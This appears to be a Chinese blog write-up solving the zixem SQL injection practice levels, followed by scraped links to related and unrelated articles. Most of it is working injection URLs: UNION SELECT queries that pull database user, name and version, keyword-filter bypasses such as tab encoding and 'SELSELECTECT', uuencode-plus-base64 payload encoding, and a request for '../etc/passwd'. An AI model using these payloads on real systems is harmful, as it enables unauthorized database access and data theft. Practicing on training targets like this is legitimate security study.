平台:

http://www.zixem.altervista.org/SQLi/

Level 1 (Super Easy)

http://www.zixem.altervista.org/SQLi/level1.php?id=1

http://www.zixem.altervista.org/SQLi/level1.php?id=1 and 1=1--+ #true

http://www.zixem.altervista.org/SQLi/level1.php?id=1 and 1=2--+ #false

3 columns

http://www.zixem.altervista.org/SQLi/level1.php?id=1 order by 3--+

http://www.zixem.altervista.org/SQLi/level1.php?id=-1 +UNION+ALL+SELECT+1,2,3--+

MySQL information

http://www.zixem.altervista.org/SQLi/level1.php?id=-1 +UNION+ALL+SELECT+CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),2,3--+

Level 2 (Easy)

http://www.zixem.altervista.org/SQLi/level2.php?showprofile=4

http://www.zixem.altervista.org/SQLi/level2.php?showprofile=4' and 1=1--+ #true

http://www.zixem.altervista.org/SQLi/level2.php?showprofile=4' and 1=2--+ #false

Find ccolumns

http://www.zixem.altervista.org/SQLi/level2.php?showprofile=4' +ORDER+BY+4--+

Showprofile 发现无回显,我们将其改成showprofile=1

http://www.zixem.altervista.org/SQLi/level2.php?showprofile=1' +UNION+ALL+SELECT+1,2,3,4--+

Find mysql information

http://www.zixem.altervista.org/SQLi/level2.php?showprofile=1' +UNION+ALL+SELECT+1,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),3,4--+

或者

http://www.zixem.altervista.org/SQLi/level2.php?showprofile=1' +UNION+ALL+SELECT+version(),database(),user(),4--+

Level 3 (Medium)

http://www.zixem.altervista.org/SQLi/level3.php?item=3

http://www.zixem.altervista.org/SQLi/level3.php?item=3' and 1=1--+ #true

http://www.zixem.altervista.org/SQLi/level3.php?item=3' and 1=2--+ #false

Find 4 columns

http://www.zixem.altervista.org/SQLi/level3.php?item=3' +ORDER+BY+4--+

http://www.zixem.altervista.org/SQLi/level3.php?item=3' +UNION+ALL+SELECT+1,2,3,4--+

http://www.zixem.altervista.org/SQLi/level3.php?item=3' +UNIONON+ALL+SELECT+1,2,3,4--+

发现无回显,我们尝试更改item的值试试

http://www.zixem.altervista.org/SQLi/level3.php?item=1' +UNIONON+ALL+SELECT+1,2,3,4--+

在字段2上进行查询MySQL information

http://www.zixem.altervista.org/SQLi/level3.php?item=1' +UNIONON+ALL+SELECT+1,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),3,4--+

Level 4 (Normal)

http://www.zixem.altervista.org/SQLi/level4.php?ebookid=7

http://www.zixem.altervista.org/SQLi/level4.php?ebookid=7' and 1=1--+ #true

http://www.zixem.altervista.org/SQLi/level4.php?ebookid=7' and 1=2--+ #false

Find 5 columns

http://www.zixem.altervista.org/SQLi/level4.php?ebookid=7' +ORDER+BY+5--+

http://www.zixem.altervista.org/SQLi/level4.php?ebookid=7' +UNION+ALL+SELECT+1,2,3,4,5--+

执行发现无相关的字段回显,我们尝试更改下ebookid的值试试

http://www.zixem.altervista.org/SQLi/level4.php?ebookid=1' +UNION+ALL+SELECT+1,2,3,4,5--+

http://www.zixem.altervista.org/SQLi/level4.php?ebookid=1' +UNION+ALL+SELECT+version(),user(),database(),4,5--+

Level 5 (Get your "bot-writing" skills)

http://www.zixem.altervista.org/SQLi/login_lvl5.php

抓包请求如下:

GET /SQLi/login_do.php?pass=123456 HTTP/1.1

Host: www.zixem.altervista.org

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Referer: http://www.zixem.altervista.org/SQLi/login_lvl5.php

Cookie: __cfduid=d1cf89af0193d0a51fc76036c94593eca1547429536

Connection: close

Upgrade-Insecure-Requests: 1

通过查看sourcecode如下

If you want a lead, enter this password.

~~~~~~~~~~~~~~~~~~ password: d1fd6ef9af6cb677e09b1b0a68301e0c ~~~~~~~~~~~~~~~~~~~~~~

owh...it's hashed! maybe you could get some help from my md5 cracker...

~~~~~~~~~~~~~~~~~~~~~~~~here: /SQLi/md5cracker.php~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://www.zixem.altervista.org/SQLi/md5cracker.php?hash=d1fd6ef9af6cb677e09b1b0a68301e0c

Level 6 (Experienced)

http://www.zixem.altervista.org/SQLi/blind_lvl6.php?serial=10 and 1=1#true

http://www.zixem.altervista.org/SQLi/blind_lvl6.php?serial=10 and 1=2 #false

Find 4 columns

http://www.zixem.altervista.org/SQLi/blind_lvl6.php?serial=10 +ORDER+BY+4

这里判断为整形的盲注,直接用穿山甲(pangolin)跑

Level 7 (Medium)

http://www.zixem.altervista.org/SQLi/level7.php?id=1

http://www.zixem.altervista.org/SQLi/level7.php?id=1 and 1=1--+ #true

http://www.zixem.altervista.org/SQLi/level7.php?id=1 and 1=2--+ #false

Find 3 columns

http://www.zixem.altervista.org/SQLi/level7.php?id=1 +ORDER+BY+3--+

http://www.zixem.altervista.org/SQLi/level7.php?id=1 +UNION+ALL+SELECT+1,2,3--+

无任何回显,更改id也无回显查看源码

最后尝试payload为如下:

http://www.zixem.altervista.org/SQLi/level7.php?id=2 +UNION+ALL+SELECT+1,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),3--+

Level 8 (Hard)

尝试注入点:

http://www.zixem.altervista.org/SQLi/lvl8.php?id=1\

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\\' at line 1 ID:

http://www.zixem.altervista.org/SQLi/lvl8.php?id=1'

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1 ID:

Age:

http://www.zixem.altervista.org/SQLi/lvl8.php?id=1' and 1=1--+

http://www.zixem.altervista.org/SQLi/lvl8.php?id=1'/**/and/**/1=1--+

http://www.zixem.altervista.org/SQLi/lvl8.php?id=1 and 1=1

http://www.zixem.altervista.org/SQLi/lvl8.php?id=1' and '1'='1--+

 

想下特殊符号的过滤

A plus sign (+)

A simple URL encoded space (%20)

A null byte (%00)

A newline (%0a)

A tab (%09)

A carriage return (%0d)

空格%20

http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%20and%201=1 #false

空字节%00

http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%00and%001=1--+ #false

换行\n %0a

http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%0aand%0a1=1--+ #false

Tab %09

http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%09and%091=1-- #true

回车%0d

http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%0dsand%0d1=1--+ #flase

http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%09and%091=1-- #true

http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%09and%091=2-- #false

Find 3 columns

http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%09ORDER%09BY%093--

枚举具体列报错:

http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%09UNION%09ALL%09SELECT%091,2,3--

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1,2,3--' at line 1 ID:

Age:

看起来好像是屏蔽了select字段,我们尝试绕过

#大小写混

http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%09UNION%09ALL%09/*!SeLECt*/%091,2,3-- #false

#Url encode

http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%09UNION%09ALL%09/*!%53eLEct*/%091,2,3-- #false

#使用特助字符

http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%09UNION%09ALL%09sel*ect%091,2,3-- #flase

http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%09UNION%09ALL%09se/**/lect%091,2,3-- #false

#关键字替换

SEselectLECT

SELSELECTECT

http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%09UNION%09ALL%09SEselectLECT%091,2,3-- #true

http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%09UNION%09ALL%09SELSELECTECT%091,2,3-- #true

wow

最终的payload如下:

http://www.zixem.altervista.org/SQLi/lvl8.php?id=2%09UNION%09ALL%09SELSELECTECT%091,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),3--

Level 9 (Medium)

http://www.zixem.altervista.org/SQLi/lvl9.php?id=1

http://www.zixem.altervista.org/SQLi/lvl9.php?id=1' and 1=1--+ #true

http://www.zixem.altervista.org/SQLi/lvl9.php?id=1' and 1=12--+ #false

Find 2 columns

http://www.zixem.altervista.org/SQLi/lvl9.php?id=1' +ORDER+BY+2--+

http://www.zixem.altervista.org/SQLi/lvl9.php?id=1'+UNION+ALL+SELECT+1,2--+

http://www.zixem.altervista.org/SQLi/lvl9.php?id=1 and 1=2' union select "../etc/passwd","2"--'

Level 10 (Pro)

http://www.zixem.altervista.org/SQLi/lvl10.php?x=ISwwYGAKYAo=

ISwwYGAKYAo=   ---- it looks like base64encode

https://www.base64decode.org/---->

!,0``

`

这种编码方式要用Uuencode decoder 进行解码

https://www.textencode.com/uudecode

构造注入语句

1 AND 1=2 UNION SELECT 1,2--

https://www.textencode.com/uuencode

<,2!!3D0@,3TR(%5.24].(%-%3$5#5"`Q+#(M+0``

`

Base64encode

PCwyISEzRDBALDNUUiglNS4yNF0uKCUtJTMkNSM1ImBRKyMoTSswYGAKYAo=

paylaod:

http://www.zixem.altervista.org/SQLi/lvl10.php?x=PCwyISEzRDBALDNUUiglNS4yNF0uKCUtJTMkNSM1ImBRKyMoTSswYGAKYAo=

构造注入语句

1 AND 1=2 UNION SELECT 1,CONCAT(user()," ",version())--

Encode

M,2!!3D0@,3TR(%5.24].(%-%3$5#5"`Q+$-/3D-!5"AU<V5R*"DL(B`B+'9E

*<G-I;VXH*2DM+0``

`

Base64encode

TSwyISEzRDBALDNUUiglNS4yNF0uKCUtJTMkNSM1ImBRKyQtLzNELSE1IkFVPFY1UioiREwoQmBCKyc5RQoqPEctSTtWWEgqMkRNKzBgYApg

http://www.zixem.altervista.org/SQLi/lvl10.php?x=TSwyISEzRDBALDNUUiglNS4yNF0uKCUtJTMkNSM1ImBRKyQtLzNELSE1IkFVPFY1UioiREwoQmBCKyc5RQoqPEctSTtWWEgqMkRNKzBgYApg

SQL Challenges的更多相关文章

  1. SQL Challenges靶机

    http://www.zixem.altervista.org/SQLi/ 第一关 http://www.zixem.altervista.org/SQLi/level1.php?id=1 and 1 ...

  2. SQL注入测试平台 SQLol -6.CHALLENGES挑战

    SQLol上面的挑战共有14关,接下来我们一关一关来突破. Challenge 0 目的是让查询返回所有的用户名,而不是只有一个. SELECT username FROM users WHERE u ...

  3. sql注入学习小结

    /* 转载请注明出处,By:珍惜少年时 小知识,只是放在博客吃饭时无聊看看,大牛勿喷. */ 珍惜少年时博客,专注网络安全 web渗透测试 00x1爆所有库: mysql> select sch ...

  4. Red Gate - SQL Source Control实现对SQL SERVER 的源代码控制

    原文地址:http://bbs.csdn.net/topics/350165431 SQL Server 一直没有一款很好的源码控制器,之前自己曾尝试自己写一个,将所有的 脚本 自动生成到某一目录下, ...

  5. Red Gate系列之二 SQL Source Control 3.0.13.4214 Edition 数据库版本控制器 完全破解+使用教程

    原文:Red Gate系列之二 SQL Source Control 3.0.13.4214 Edition 数据库版本控制器 完全破解+使用教程 Red Gate系列之二 SQL Source Co ...

  6. Linux 安装Xampp以后,Apache服务器无法启动,以及启动后,连接sql数据库遇到的问题的解决方法

    xampp安装以后,搭建服务器的时候,我们会遇到哪些问题呢?1.MySQL Database 可以启动,而Apache Web Server无法启动?应该是80端口被占用,那么如何解决呢?我们可以通过 ...

  7. SQLI LABS Challenges Part(54-65) WriteUp

    终于到了最后一部分,这些关跟之前不同的是这里是限制次数的. less-54: 这题比较好玩,10次之内爆出数据.先试试是什么类型: ?id=1' and '1 ==>>正常 ?id=1' ...

  8. Stream Processing 101: From SQL to Streaming SQL in 10 Minutes

    转自:https://wso2.com/library/articles/2018/02/stream-processing-101-from-sql-to-streaming-sql-in-ten- ...

  9. 【技巧总结】Penetration Test Engineer[3]-Web-Security(SQL注入、XXS、代码注入、命令执行、变量覆盖、XSS)

    3.Web安全基础 3.1.HTTP协议 1)TCP/IP协议-HTTP 应用层:HTTP.FTP.TELNET.DNS.POP3 传输层:TCP.UDP 网络层:IP.ICMP.ARP 2)常用方法 ...

随机推荐

  1. [Swift]LeetCode745. 前缀和后缀搜索 | Prefix and Suffix Search

    Given many words, words[i] has weight i. Design a class WordFilter that supports one function, WordF ...

  2. Unable to preventDefault inside passive event listener due to target being treated as passive

    Unable to preventDefault inside passive event listener due to target being treated as passive 今天在做项目 ...

  3. 学习Python--变量进阶

    变量进阶(理解) 目标 变量的引用 可变和不可变类型 局部变量和全局变量 01. 变量的引用 变量 和 数据 都是保存在 内存 中的 在 Python 中 函数 的 参数传递 以及 返回值 都是靠 引 ...

  4. 小伙子,你真的搞懂 transient 关键字了吗?

    先解释下什么是序列化 我们的对象并不只是存在内存中,还需要传输网络,或者保存起来下次再加载出来用,所以需要Java序列化技术. Java序列化技术正是将对象转变成一串由二进制字节组成的数组,可以通过将 ...

  5. windows服务器解决挖矿程序问题

    前几天发现服务器报警,cpu使用率已达100%,查资料知道正是最近比较流行的挖矿程序在捣鬼.我们使用的是阿里云的服务器,操作系统是windows server.网上有大量的资料讲如何处理,我把自己处理 ...

  6. slf4j 和 log4j的关系及合用Maven配置

    最近因为项目实在是太忙,都没有时间学习.有时候会很矛盾,一方面是全心全意的想去快速做完项目,一方面又想学习点新东西.这样导致这两三个月都没有去学习一些新的东西,这周我开始创建自己的maven项目,因为 ...

  7. JVM基础系列开篇:为什么要学虚拟机?

    跟许多人一样,我一开始接触 Java 虚拟机只是因为面试需要用到,所以硬着头皮看看.所以很多人对于为什么要学虚拟机这个问题,他们的答案都是:因为面试.但我经过了几年的学习和实战,我发现其实学习虚拟机并 ...

  8. SpringCloud(5)---Feign服务调用

    SpringCloud(5)---Feign服务调用 上一篇写了通过Ribbon进行服务调用,这篇其它都一样,唯一不一样的就是通过Feign进行服务调用. 注册中心和商品微服务不变,和上篇博客一样,具 ...

  9. 简单实现 C# 与 Javascript的兼容

    本文章介绍下自己这刚实现的一个c#与js交互的插件.需求来源于一次与朋友的讨论.主要对话如下: 朋友:最近我想模拟一些数据,来测试我现在写的接口,但手工编写这些测试数据太麻烦了 本人:是啊,.net能 ...

  10. WinSocket同时接入量的疑惑(求解...)

    在写TCP应用的时候一般都通过Accept来接入连接的接入,但对于Socket来说这个Accept同时能处理多大的量一般都没有明确说明,在应用中主要根据自己的需要设置Listen的队列数量.那List ...